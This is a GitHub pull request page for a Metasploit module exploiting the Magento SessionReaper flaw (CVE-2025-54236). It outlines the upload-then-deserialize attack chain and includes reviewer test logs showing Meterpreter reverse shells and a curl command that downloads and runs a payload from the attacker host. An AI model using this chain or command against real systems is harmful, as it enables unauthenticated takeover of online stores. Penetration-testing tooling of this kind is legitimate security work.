Skip to content

Add Magento SessionReaper (CVE-2025-54236) exploit module #20725

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
Chocapikk wants to merge 9 commits into
base: master
Choose a base branch
from
Open

Add Magento SessionReaper (CVE-2025-54236) exploit module #20725

Chocapikk wants to merge 9 commits into from
+670 −0

Conversation

@Chocapikk
Copy link
Contributor

@Chocapikk Chocapikk commented Nov 24, 2025
edited
Loading

Hello Metasploit Team,

This PR adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution.

The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint. The exploit chain consists of:

  1. Uploading a malicious PHP session file containing a Guzzle/FW1 deserialization payload via the unauthenticated /customer/address_file/upload endpoint
  2. Triggering deserialization by sending a crafted JSON payload to the REST API endpoint /rest/default/V1/guest-carts/{cart_id}/order that modifies the session savePath to point to the uploaded file
  3. Executing the uploaded PHP code to gain remote code execution

This module supports multiple targets:

  • PHP In-Memory (php/meterpreter/reverse_tcp)
  • Unix/Linux Command Shell (cmd/linux/http/x64/meterpreter/reverse_tcp)
  • Windows Command Shell (cmd/windows/http/x64/meterpreter/reverse_tcp)

The module includes:

  • Automatic vulnerability detection via the check() method
  • Support for both PHP and command payloads
  • Complete documentation with real-world examples
  • Automatic file cleanup using FileDropper mixin

The module has been tested against Magento 2.4.4 and passes all code quality checks (msftidy, rubocop, msftidy_docs).

Thanks

@Chocapikk Chocapikk closed this Nov 24, 2025
@Chocapikk Chocapikk deleted the magento branch November 24, 2025 20:06
@Chocapikk Chocapikk restored the magento branch November 24, 2025 20:07
@Chocapikk Chocapikk reopened this Nov 24, 2025
@dledda-r7
Copy link
Contributor

dledda-r7 commented Nov 25, 2025

@Chocapikk Welcome back 🔥

jvoisin
jvoisin reviewed Nov 25, 2025
View reviewed changes
@jheysel-r7 jheysel-r7 self-assigned this Dec 5, 2025
@jheysel-r7 jheysel-r7 added module docs rn-fix release notes fix rn-modules release notes for new or majorly enhanced modules labels Dec 5, 2025
@jheysel-r7 jheysel-r7 removed the rn-fix release notes fix label Dec 5, 2025
jheysel-r7
jheysel-r7 reviewed Dec 8, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great work @Chocapikk. Testing was as expected

Testing

PHP Target

msf exploit(multi/http/magento_sessionreaper) > set TARGET 0
TARGET => 0
msf exploit(multi/http/magento_sessionreaper) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/magento_sessionreaper) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target returned 500 error with SessionHandler
[*] Generating Guzzle/FW1 deserialization payload...
[*] Uploading session file with Guzzle payload...
[*] Uploading malicious session file: sess_c3fb3992f5cc0a1c7f345d1a1443fb68
[*] Triggering deserialization with savePath: media/customer_address/s/e
[+] Deserialization triggered (HTTP 404)
[*] Executing payload at: /pub/orZQ3.php
[*] Sending stage (41224 bytes) to 172.16.199.1
[+] Deleted orZQ3.php
[+] Deleted media/customer_address/s/e/sess_c3fb3992f5cc0a1c7f345d1a1443fb68
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:58027) at 2025-12-08 10:51:27 -0800

Linux Target

msf exploit(multi/http/magento_sessionreaper) > set TARGET 1
TARGET => 1
msf exploit(multi/http/magento_sessionreaper) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/magento_sessionreaper) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/magento_sessionreaper) > set verbose true
verbose => true
run msf exploit(multi/http/magento_sessionreaper) > run
[*] Command to run on remote host: curl -so ./xBCMazylYe http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./xBCMazylYe;./xBCMazylYe&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target returned 500 error with SessionHandler
[*] Generating Guzzle/FW1 deserialization payload...
[*] Uploading session file with Guzzle payload...
[*] Uploading malicious session file: sess_7799d6d53785e66b64e7fd933e3a02cf
[*] Triggering deserialization with savePath: media/customer_address/s/e
[+] Deserialization triggered (HTTP 404)
[*] Executing payload at: /pub/F7Gux.php
[*] Client 172.16.199.1 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.1 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.1
[+] Deleted F7Gux.php
[+] Deleted media/customer_address/s/e/sess_7799d6d53785e66b64e7fd933e3a02cf
[+] Deleted xBCMazylYe
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:54588) at 2025-12-08 10:32:31 -0800

meterpreter > getuid
sysinServer username: www-data
fo
meterpreter > sysinfo
Computer     : 172.19.0.2
OS           : Debian 11.5 (Linux 6.12.54-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Check Command in Isolation:

msf exploit(multi/http/magento_sessionreaper) > check
[*] 127.0.0.1:8082 - The target appears to be vulnerable. Target returned 500 error with SessionHandler

documentation/modules/exploit/multi/http/magento_sessionreaper.md
allows an unauthenticated user to gain arbitrary code execution through nested deserialization and unauthenticated file
upload.

This vulnerability (CVE-2025-54236, also known as SessionReaper) affects Magento 2.x instances using file-based session
Copy link
Contributor

@jheysel-r7 jheysel-r7 Dec 8, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is file-based sessions storage enabled by default? I think it would be worth explicitly mention that detail here.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

+1 more reviewer

@jvoisin jvoisin jvoisin left review comments

Reviewers whose approvals may not affect merge requirements

At least 1 approving review is required to merge this pull request.

Assignees

@jheysel-r7 jheysel-r7

Labels

docs module rn-modules release notes for new or majorly enhanced modules

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@Chocapikk @dledda-r7 @jvoisin @jheysel-r7